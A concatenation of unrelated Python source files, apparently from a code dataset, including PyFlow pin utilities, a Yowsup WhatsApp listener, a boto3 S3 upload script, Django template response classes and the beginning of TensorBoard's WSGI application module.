rhsPin = rhsNode.orderedInputs[rhsInPinIndex]
return connectPins(lhsPin, rhsPin)
def traverseConstrainedPins(startFrom, callback):
"""Iterate over constrained and connected pins
Iterates over all constrained chained pins of type :class:`Any <PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin>` and passes pin into callback function. Callback will be executed once for every pin
:param startFrom: First pin to start Iteration
:type startFrom: :class:`~PyFlow.Core.PinBase.PinBase`
:param callback: Functor to execute in each iterated pin.
:type callback: callback(:class:`~PyFlow.Core.PinBase.PinBase`)
"""
if not startFrom.isAny():
return
traversed = set()
def worker(pin):
traversed.add(pin)
callback(pin)
if pin.constraint is None:
nodePins = set()
else:
nodePins = set(pin.owningNode().constraints[pin.constraint])
for connectedPin in getConnectedPins(pin):
if connectedPin.isAny():
nodePins.add(connectedPin)
for neighbor in nodePins:
if neighbor not in traversed:
worker(neighbor)
worker(startFrom)
def disconnectPins(src, dst):
"""Disconnects two pins
:param src: left hand side pin
:type src: :py:class:`~PyFlow.Core.PinBase.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`~PyFlow.Core.PinBase.PinBase`
:returns: True if disconnection success
:rtype: bool
"""
if arePinsConnected(src, dst):
if src.direction == PinDirection.Input:
src, dst = dst, src
src.affects.remove(dst)
dst.affected_by.remove(src)
src.pinDisconnected(dst)
dst.pinDisconnected(src)
push(dst)
if src.isExec() and dst.isExec():
src.onExecute.disconnect(dst.call)
return True
return False
def push(start_from):
"""Marks dirty all ports from start to the right
this part of graph will be recomputed every tick
:param start_from: pin from which recursion begins
:type start_from: :py:class:`~PyFlow.Core.PinBase.PinBase`
"""
if not len(start_from.affects) == 0:
start_from.setDirty()
for i in start_from.affects:
i.setDirty()
push(i)
def extractDigitsFromEndOfString(string):
"""Get digits at end of a string
Example:
>>> nums = extractDigitsFromEndOfString("h3ello154")
>>> print(nums, type(nums))
>>> 154 <class 'int'>
:param string: Input numbered string
:type string: str
:returns: Numbers in the final of the string
:rtype: int
"""
result = re.search('(\d+)$', string)
if result is not None:
return int(result.group(0))
def removeDigitsFromEndOfString(string):
"""Delete the numbers at the end of a string
Similar to :func:`~PyFlow.Core.Common.extractDigitsFromEndOfString`, but removes digits in the end.
:param string: Input string
:type string: string
:returns: Modified string
:rtype: string
"""
return re.sub(r'\d+$', '', string)
def getUniqNameFromList(existingNames, name):
"""Create unique name
Iterates over **existingNames** and extracts the end digits to find a new unique id
:param existingNames: List of strings where to search for existing indexes
:type existingNames: list
:param name: Name to obtain a unique version from
:type name: str
:returns: New name non overlapin with any in existingNames
:rtype: str
"""
if name not in existingNames:
return name
ids = set()
for existingName in existingNames:
digits = extractDigitsFromEndOfString(existingName)
if digits is not None:
ids.add(digits)
idx = findGoodId(ids)
nameNoDigits = removeDigitsFromEndOfString(name)
return nameNoDigits + str(idx)
def clearSignal(signal):
"""Disconnects all receivers
:param signal: emitter
:type signal: :class:`~blinker.base.Signal`
"""
for receiver in list(signal.receivers.values()):
if isinstance(receiver, weakref.ref):
signal.disconnect(receiver())
else:
signal.disconnect(receiver)
class SingletonDecorator:
"""Decorator to make class unique, so each time called same object returned
"""
allInstances = []
@staticmethod
def destroyAll():
for instance in SingletonDecorator.allInstances:
instance.destroy()
def __init__(self, cls):
self.cls = cls
self.instance = None
self.allInstances.append(self)
def destroy(self):
del self.instance
self.instance = None
def __call__(self, *args, **kwds):
if self.instance is None:
self.instance = self.cls(*args, **kwds)
return self.instance
class DictElement(tuple):
"""PyFlow dict element class
This subclass of python's :class:`tuple` is to represent dict elements to construct typed dicts
"""
def __new__(self, a=None, b=None):
if a is None and b is None:
new = ()
elif b is None:
if isinstance(a, tuple) and len(a) <= 2:
new = a
else:
raise Exception("non Valid Input")
else:
new = (a, b)
return super(DictElement, self).__new__(self, new)
class PFDict(dict):
"""This subclass of python's :class:`dict` implements a key typed dictionary.
Only defined data types can be used as keys, and only hashable ones as determined by
>>> isinstance(dataType, collections.Hashable)
To make a class Hashable some methods should be implemented:
Example:
::
class C:
def __init__(self, x):
self.x = x
def __repr__(self):
return "C({})".format(self.x)
def __hash__(self):
return hash(self.x)
def __eq__(self, other):
return (self.__class__ == other.__class__ and self.x == other.x)
"""
def __init__(self, keyType, valueType=None, inp={}):
"""
:param keyType: Key dataType
:param valueType: value dataType, defaults to None
:type valueType: optional
:param inp: Construct from another dict, defaults to {}
:type inp: dict, optional
"""
super(PFDict, self).__init__(inp)
self.keyType = keyType
self.valueType = valueType
def __setitem__(self, key, item):
"""Re implements Python Dict __setitem__ to only allow Typed Keys.
Will throw an Exception if non Valid KeyType
"""
if type(key) == self.getClassFromType(self.keyType):
super(PFDict, self).__setitem__(key, item)
else:
raise Exception(
"Valid key should be a {0}".format(self.getClassFromType(self.keyType)))
def getClassFromType(self, pinType):
"""
Gets the internal data structure for a defined pin type
:param pinType: pinType Name
:type pinType: class or None
"""
pin = findPinClassByType(pinType)
if pin:
pinClass = pin.internalDataStructure()
return pinClass
return None
class PinReconnectionPolicy(IntEnum):
"""How to behave if pin has connections and another connection about to be performed.
"""
DisconnectIfHasConnections = 0 #: Current connection will be broken
ForbidConnection = 1 #: New connection will be cancelled
class PinOptions(Flag):
"""Used to determine how Pin behaves.
Apply flags on pin instances.
.. seealso:: :meth:`~PyFlow.Core.PinBase.PinBase.enableOptions` :meth:`~PyFlow.Core.PinBase.PinBase.disableOptions`
"""
ArraySupported = auto() #: Pin can hold array data structure
DictSupported = auto() #: Pin can hold dict data structure
SupportsOnlyArrays = auto() #: Pin will only support other pins with array data structure
AllowMultipleConnections = auto() #: This enables pin to allow more that one input connection. See :func:`~PyFlow.Core.Common.connectPins`
ChangeTypeOnConnection = auto() #: Used by :class:`~PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin` to determine if it can change its data type on new connection.
RenamingEnabled = auto() #: Determines if pin can be renamed
Dynamic = auto() #: Specifies if pin was created dynamically (during program runtime)
AlwaysPushDirty = auto() #: Pin will always be seen as dirty (computation needed)
Storable = auto() #: Determines if pin data can be stored when pin serialized
AllowAny = auto() #: Special flag that allow a pin to be :class:`~PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin`, which means non typed without been marked as error. By default a :py:class:`PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin` need to be initialized with some data type, other defined pin. This flag overrides that. Used in lists and non typed nodes
DictElementSupported = auto() #: Dicts are constructed with :class:`DictElement` objects. So dict pins will only allow other dicts until this flag enabled. Used in :class:`~PyFlow.Packages.PyFlowBase.Nodes.makeDict` node
class StructureType(IntEnum):
"""Used to determine structure type for values.
"""
Single = 0 #: Single data structure
Array = 1 #: Python list structure, represented as arrays -> typed and lists -> non typed
Dict = 2 #: :py:class:`PFDict` structure, is basically a rey typed python dict
Multi = 3 #: This means it can became any of the previous ones on connection/user action
def findStructFromValue(value):
"""Finds :class:`~PyFlow.Core.Common.StructureType` from value
:param value: input value to find structure.
:returns: Structure Type for input value
:rtype: :class:`~PyFlow.Core.Common.StructureType`
"""
if isinstance(value, list):
return StructureType.Array
if isinstance(value, dict):
return StructureType.Dict
return StructureType.Single
class PinSelectionGroup(IntEnum):
"""Used in :meth:`~PyFlow.Core.NodeBase.NodeBase.getPinSG` for optimization purposes
"""
Inputs = 0 #: Input pins
Outputs = 1 #: Outputs pins
BothSides = 2 #: Both sides pins
class AccessLevel(IntEnum):
"""Can be used for code generation
"""
public = 0 #: public
private = 1 #: private
protected = 2 #: protected
class PinDirection(IntEnum):
"""Determines whether it is input pin or output
"""
Input = 0 #: Left side pins
Output = 1 #: Right side pins
class NodeTypes(IntEnum):
"""Determines whether it is callable node or pure
"""
Callable = 0 #: Callable node is a node with exec pins
Pure = 1 #: Normal nodes
class Direction(IntEnum):
""" Direction identifiers
"""
Left = 0 #: Left
Right = 1 #: Right
Up = 2 #: Up
Down = 3 #: Down
class PinSpecifires:
"""Pin specifires constants
:var SUPPORTED_DATA_TYPES: To specify supported data types list
:var CONSTRAINT: To specify type constraint key
:var STRUCT_CONSTRAINT: To specify struct constraint key
:var ENABLED_OPTIONS: To enable options
:var DISABLED_OPTIONS: To disable options
:var INPUT_WIDGET_VARIANT: To specify widget variant string
:var DESCRIPTION: To specify description for pin, which will be used as tooltip
:var VALUE_LIST: Specific for string pin. If specified, combo box will be created
:var VALUE_RANGE: Specific for ints and floats. If specified, slider will be created instead of value box
:var DRAGGER_STEPS: To specify custom value dragger steps
"""
SUPPORTED_DATA_TYPES = "supportedDataTypes"
CONSTRAINT = "constraint"
STRUCT_CONSTRAINT = "structConstraint"
ENABLED_OPTIONS = "enabledOptions"
DISABLED_OPTIONS = "disabledOptions"
INPUT_WIDGET_VARIANT = "inputWidgetVariant"
DESCRIPTION = "Description"
VALUE_LIST = "ValueList"
VALUE_RANGE = "ValueRange"
DRAGGER_STEPS = "DraggerSteps"
class NodeMeta:
"""Node meta constants
:var CATEGORY: To specify category for node. Will be considered by node box
:var KEYWORDS: To specify list of additional keywords, used in node box search field
:var CACHE_ENABLED: To specify if node is cached or not
"""
CATEGORY = "Category"
KEYWORDS = "Keywords"
CACHE_ENABLED = "CacheEnabled"
|
py | 1a32edb174c2137d634770140e718bfc388a2cc8 | import luigi
class MyTask(luigi.ExternalTask):
param = luigi.Parameter(default=42)
def run(self):
f = self.output().open('w')
f.write("hello world from run")
f.close()
def output(self):
return luigi.LocalTarget('/tmp/foo/bar-%s.txt' % str(self.param))
if __name__ == '__main__':
luigi.run(['MyTask', '--local-scheduler'])
|
py | 1a32ee8cbfb03a873bf8765c909206533a9213e8 | '''
Copyright (c) <2012> Tarek Galal <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR
A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
import os
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
os.sys.path.insert(0,parentdir)
import datetime, sys
if sys.version_info >= (3, 0):
raw_input = input
from Yowsup.connectionmanager import YowsupConnectionManager
class WhatsappListenerClient:
def __init__(self, keepAlive = False, sendReceipts = False):
self.sendReceipts = sendReceipts
connectionManager = YowsupConnectionManager()
connectionManager.setAutoPong(keepAlive)
self.signalsInterface = connectionManager.getSignalsInterface()
self.methodsInterface = connectionManager.getMethodsInterface()
self.signalsInterface.registerListener("message_received", self.onMessageReceived)
self.signalsInterface.registerListener("auth_success", self.onAuthSuccess)
self.signalsInterface.registerListener("auth_fail", self.onAuthFailed)
self.signalsInterface.registerListener("disconnected", self.onDisconnected)
self.cm = connectionManager
def login(self, username, password):
self.username = username
self.methodsInterface.call("auth_login", (username, password))
while True:
raw_input()
def onAuthSuccess(self, username):
print("Authed %s" % username)
self.methodsInterface.call("ready")
def onAuthFailed(self, username, err):
print("Auth Failed!")
def onDisconnected(self, reason):
print("Disconnected because %s" %reason)
def onMessageReceived(self, messageId, jid, messageContent, timestamp, wantsReceipt, pushName, isBroadCast):
formattedDate = datetime.datetime.fromtimestamp(timestamp).strftime('%d-%m-%Y %H:%M')
print("%s [%s]:%s"%(jid, formattedDate, messageContent))
if wantsReceipt and self.sendReceipts:
self.methodsInterface.call("message_ack", (jid, messageId))
|
py | 1a32ef1a28a23954681bd0585cd317bb5a535260 | from user_Key import access_key,secret_access_key
import boto3
import os
client = boto3.client('s3', aws_access_key_id = access_key,
aws_secret_access_key = secret_access_key)
for file in os.listdir():
if '.py' in file:
upload_file_bucket = 'trialandtest'
upload_file_key = 'python scripts/' + str(file)
client.upload_file(file, upload_file_bucket, upload_file_key)
elif '.csv' in file:
upload_file_bucket_csv = 'time1231'
upload_file_key_csv = ' csv_files/' + str(file)
client.upload_file(file, upload_file_bucket_csv, upload_file_key_csv)
# elif 'file type' in file:
# upload_file_bucket_csv = 'bucketname'
# upload_file_key_csv = ' foldername' + str(file)
# client.upload_file(file, upload_file_bucket_csv, upload_file_key_csv)
|
py | 1a32ef9ffa06e69d5e1ddd28848db9acae3b10da | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.website.utils import cleanup_page_name
from frappe.website.render import clear_cache
from frappe.modules import get_module_name
class WebsiteGenerator(Document):
website = frappe._dict()
def __init__(self, *args, **kwargs):
self.route = None
super(WebsiteGenerator, self).__init__(*args, **kwargs)
def get_website_properties(self, key=None, default=None):
out = getattr(self, '_website', None) or getattr(self, 'website', None) or {}
if not isinstance(out, dict):
# website may be a property too, so ignore
out = {}
if key:
return out.get(key, default)
else:
return out
def autoname(self):
if not self.name and self.meta.autoname != "hash":
self.name = self.scrubbed_title()
def onload(self):
self.get("__onload").update({
"is_website_generator": True,
"published": self.is_website_published()
})
def validate(self):
self.set_route()
def set_route(self):
if self.is_website_published() and not self.route:
self.route = self.make_route()
if self.route:
self.route = self.route.strip('/.')[:139]
def make_route(self):
'''Returns the default route. If `route` is specified in DocType it will be
route/title'''
from_title = self.scrubbed_title()
if self.meta.route:
return self.meta.route + '/' + from_title
else:
return from_title
def scrubbed_title(self):
return self.scrub(self.get(self.get_title_field()))
def get_title_field(self):
'''return title field from website properties or meta.title_field'''
title_field = self.get_website_properties('page_title_field')
if not title_field:
if self.meta.title_field:
title_field = self.meta.title_field
elif self.meta.has_field('title'):
title_field = 'title'
else:
title_field = 'name'
return title_field
def clear_cache(self):
super(WebsiteGenerator, self).clear_cache()
clear_cache(self.route)
def scrub(self, text):
return cleanup_page_name(text).replace('_', '-')
def get_parents(self, context):
'''Return breadcrumbs'''
pass
def on_update(self):
self.send_indexing_request()
def on_trash(self):
self.clear_cache()
self.send_indexing_request('URL_DELETED')
def is_website_published(self):
"""Return true if published in website"""
if self.get_condition_field():
return self.get(self.get_condition_field()) and True or False
else:
return True
def get_condition_field(self):
condition_field = self.get_website_properties('condition_field')
if not condition_field:
if self.meta.is_published_field:
condition_field = self.meta.is_published_field
return condition_field
def get_page_info(self):
route = frappe._dict()
route.update({
"doc": self,
"page_or_generator": "Generator",
"ref_doctype":self.doctype,
"idx": self.idx,
"docname": self.name,
"controller": get_module_name(self.doctype, self.meta.module),
})
route.update(self.get_website_properties())
if not route.page_title:
route.page_title = self.get(self.get_title_field())
return route
def send_indexing_request(self, operation_type='URL_UPDATED'):
"""Send indexing request on update/trash operation."""
if frappe.db.get_single_value('Website Settings', 'enable_google_indexing') \
and self.is_website_published() and self.meta.allow_guest_to_view:
url = frappe.utils.get_url(self.route)
frappe.enqueue('frappe.website.doctype.website_settings.google_indexing.publish_site', \
url=url, operation_type=operation_type) |
py | 1a32efa27d9b4ee315e6a18077fba36c9836fadb | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .key_vault_management_client import KeyVaultManagementClient
from .version import VERSION
__all__ = ['KeyVaultManagementClient']
__version__ = VERSION
|
py | 1a32f1228c6c69e3794abf864c6ab5a9b6b46ef1 | #!/usr/bin/env python
# encoding: utf-8
import sys, os
from django.core.management.base import BaseCommand, CommandError
from django.core.exceptions import ImproperlyConfigured
#from pprint import pformat
from optparse import make_option
from . import echo_banner
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--queuename', '-n', dest='queue_name', default='default',
help="Name of queue, as specified in settings.py (defaults to 'default')",
),
make_option('--indent', '-t', dest='indent', default='0',
help="Levels to indent the output.",
),
)
help = ('Dumps the contents of a signal queue to a serialized format.')
requires_model_validation = True
can_import_settings = True
def handle(self, *args, **options):
echo_banner()
try:
return self.dump_queue(args, options)
except ImproperlyConfigured, err:
self.echo("*** ERROR in configuration: %s" % err)
self.echo("*** Check the signalqueue-related options in your settings.py.")
def echo(self, *args, **kwargs):
""" Print in color to stdout. """
text = " ".join([str(item) for item in args])
DEBUG = False
if DEBUG:
color = kwargs.get("color",32)
self.stdout.write("\033[0;%dm%s\033[0;m" % (color, text))
else:
print text
def dump_queue(self, apps, options):
from django.conf import settings
from signalqueue import SQ_RUNMODES as runmodes
from signalqueue.worker import backends
import json as library_json
queue_name = options.get('queue_name')
indent = int(options.get('indent'))
queues = backends.ConnectionHandler(settings.SQ_QUEUES, runmodes['SQ_ASYNC_MGMT'])
if not queue_name in queues:
self.echo("\n--- No definition found for a queue named '%s'" % queue_name,
color=16)
self.echo("\n--- Your defined queues have these names: '%s'" % (
"', '".join(queues.keys()),),
color=16)
self.echo("\n>>> Exiting ...\n\n",
color=16)
sys.exit(2)
queue = queues[queue_name]
try:
queue_available = queue.ping()
except:
self.echo("\n--- Can't ping the backend for %s named '%s'" % (
queue.__class__.__name__, queue_name),
color=16)
self.echo("\n--- Is the server running?",
color=16)
self.echo("\n>>> Exiting ...\n\n",
color=16)
sys.exit(2)
if not queue_available:
self.echo("\n--- Can't ping the backend for %s named '%s'" % (
queue.__class__.__name__, queue_name),
color=16)
self.echo("\n--- Is the server running?",
color=16)
self.echo("\n>>> Exiting ...\n\n",
color=16)
sys.exit(2)
queue_json = repr(queue)
if indent > 0:
queue_out = library_json.loads(queue_json)
print library_json.dumps(queue_out, indent=indent)
else:
print queue_json |
py | 1a32f2b4cd7157a7fdec2ad17394396bcaafbad6 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.6
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1HorizontalPodAutoscaler(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1HorizontalPodAutoscalerSpec',
'status': 'V1HorizontalPodAutoscalerStatus'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None): # noqa: E501
"""V1HorizontalPodAutoscaler - a model defined in OpenAPI""" # noqa: E501
self._api_version = None
self._kind = None
self._metadata = None
self._spec = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
if spec is not None:
self.spec = spec
if status is not None:
self.status = status
@property
def api_version(self):
"""Gets the api_version of this V1HorizontalPodAutoscaler. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1HorizontalPodAutoscaler.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1HorizontalPodAutoscaler. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1HorizontalPodAutoscaler. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1HorizontalPodAutoscaler.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1HorizontalPodAutoscaler. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1HorizontalPodAutoscaler. # noqa: E501
:return: The metadata of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1HorizontalPodAutoscaler.
:param metadata: The metadata of this V1HorizontalPodAutoscaler. # noqa: E501
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""Gets the spec of this V1HorizontalPodAutoscaler. # noqa: E501
:return: The spec of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: V1HorizontalPodAutoscalerSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""Sets the spec of this V1HorizontalPodAutoscaler.
:param spec: The spec of this V1HorizontalPodAutoscaler. # noqa: E501
:type: V1HorizontalPodAutoscalerSpec
"""
self._spec = spec
@property
def status(self):
"""Gets the status of this V1HorizontalPodAutoscaler. # noqa: E501
:return: The status of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: V1HorizontalPodAutoscalerStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1HorizontalPodAutoscaler.
:param status: The status of this V1HorizontalPodAutoscaler. # noqa: E501
:type: V1HorizontalPodAutoscalerStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1HorizontalPodAutoscaler):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
py | 1a32f2d45b2458b516e1e5b45b5b10c39a5f6e9f | # from profilehooks import profile
from django.http import HttpResponse
from .loader import get_template, select_template
class ContentNotRenderedError(Exception):
pass
class SimpleTemplateResponse(HttpResponse):
rendering_attrs = ['template_name', 'context_data', '_post_render_callbacks']
def __init__(self, template, context=None, content_type=None, status=None,
charset=None, using=None):
# It would seem obvious to call these next two members 'template' and
# 'context', but those names are reserved as part of the test Client
# API. To avoid the name collision, we use different names.
self.template_name = template
self.context_data = context
self.using = using
self._post_render_callbacks = []
# _request stores the current request object in subclasses that know
# about requests, like TemplateResponse. It's defined in the base class
# to minimize code duplication.
# It's called self._request because self.request gets overwritten by
# django.test.client.Client. Unlike template_name and context_data,
# _request should not be considered part of the public API.
self._request = None
# content argument doesn't make sense here because it will be replaced
# with rendered template so we always pass empty string in order to
# prevent errors and provide shorter signature.
super().__init__('', content_type, status, charset=charset)
# _is_rendered tracks whether the template and context has been baked
# into a final response.
# Super __init__ doesn't know any better than to set self.content to
# the empty string we just gave it, which wrongly sets _is_rendered
# True, so we initialize it to False after the call to super __init__.
self._is_rendered = False
def __getstate__(self):
"""
Raise an exception if trying to pickle an unrendered response. Pickle
only rendered data, not the data used to construct the response.
"""
obj_dict = self.__dict__.copy()
if not self._is_rendered:
raise ContentNotRenderedError('The response content must be '
'rendered before it can be pickled.')
for attr in self.rendering_attrs:
if attr in obj_dict:
del obj_dict[attr]
return obj_dict
def resolve_template(self, template):
"""Accept a template object, path-to-template, or list of paths."""
if isinstance(template, (list, tuple)):
return select_template(template, using=self.using)
elif isinstance(template, str):
return get_template(template, using=self.using)
else:
return template
def resolve_context(self, context):
return context
@property
def rendered_content(self):
"""Return the freshly rendered content for the template and context
described by the TemplateResponse.
This *does not* set the final content of the response. To set the
response content, you must either call render(), or set the
content explicitly using the value of this property.
"""
template = self.resolve_template(self.template_name)
context = self.resolve_context(self.context_data)
return template.render(context, self._request)
def add_post_render_callback(self, callback):
"""Add a new post-rendering callback.
If the response has already been rendered,
invoke the callback immediately.
"""
if self._is_rendered:
callback(self)
else:
self._post_render_callbacks.append(callback)
# @profile(immediate=True, sort=['tottime'], dirs=True)
def render(self):
"""Render (thereby finalizing) the content of the response.
If the content has already been rendered, this is a no-op.
Return the baked response instance.
"""
retval = self
if not self._is_rendered:
self.content = self.rendered_content
for post_callback in self._post_render_callbacks:
newretval = post_callback(retval)
if newretval is not None:
retval = newretval
return retval
@property
def is_rendered(self):
return self._is_rendered
def __iter__(self):
if not self._is_rendered:
raise ContentNotRenderedError(
'The response content must be rendered before it can be iterated over.'
)
return super().__iter__()
@property
def content(self):
if not self._is_rendered:
raise ContentNotRenderedError(
'The response content must be rendered before it can be accessed.'
)
return super().content
@content.setter
def content(self, value):
"""Set the content for the response."""
HttpResponse.content.fset(self, value)
self._is_rendered = True
class TemplateResponse(SimpleTemplateResponse):
rendering_attrs = SimpleTemplateResponse.rendering_attrs + ['_request']
def __init__(self, request, template, context=None, content_type=None,
status=None, charset=None, using=None):
super().__init__(template, context, content_type, status, charset, using)
self._request = request
|
py | 1a32f4163314a06a1813d797a03670a0499d4229 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
Provides TensorBoardWSGIApp for building a TensorBoard WSGI app.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import base64
import collections
import contextlib
import hashlib
import json
import os
import re
import shutil
import sqlite3
import tempfile
import textwrap
import threading
import time
import six
from six.moves.urllib import parse as urlparse # pylint: disable=wrong-import-order
from werkzeug import wrappers
from tensorboard import errors
from tensorboard.backend import empty_path_redirect
from tensorboard.backend import experiment_id
from tensorboard.backend import http_util
from tensorboard.backend import path_prefix
from tensorboard.backend.event_processing import db_import_multiplexer
from tensorboard.backend.event_processing import data_provider as event_data_provider # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_accumulator as event_accumulator # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.TENSORS: 10,
}
# TODO(@wchargin): Once SQL mode is in play, replace this with an
# alternative that does not privilege first-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
DATA_PREFIX = '/data'
PLUGIN_PREFIX = '/plugin'
PLUGINS_LISTING_ROUTE = '/plugins_listing'
PLUGIN_ENTRY_ROUTE = '/plugin_entry.html'
# Slashes in a plugin name could throw the router for a loop. An empty
# name would be confusing, too. To be safe, let's restrict the valid
# names as follows.
_VALID_PLUGIN_RE = re.compile(r'^[A-Za-z0-9_.-]+$')
logger = tb_logging.get_logger()
def tensor_size_guidance_from_flags(flags):
"""Apply user per-summary size guidance overrides."""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
if not flags or not flags.samples_per_plugin:
return tensor_size_guidance
for token in flags.samples_per_plugin.split(','):
k, v = token.strip().split('=')
tensor_size_guidance[k] = int(v)
return tensor_size_guidance
def standard_tensorboard_wsgi(flags, plugin_loaders, assets_zip_provider):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugin_loaders: A list of TBLoader instances.
assets_zip_provider: See TBContext documentation for more information.
Returns:
The new TensorBoard WSGI application.
:type plugin_loaders: list[base_plugin.TBLoader]
:rtype: TensorBoardWSGI
"""
data_provider = None
multiplexer = None
reload_interval = flags.reload_interval
if flags.db_import:
# DB import mode.
db_uri = flags.db
# Create a temporary DB file if we weren't given one.
if not db_uri:
tmpdir = tempfile.mkdtemp(prefix='tbimport')
atexit.register(shutil.rmtree, tmpdir)
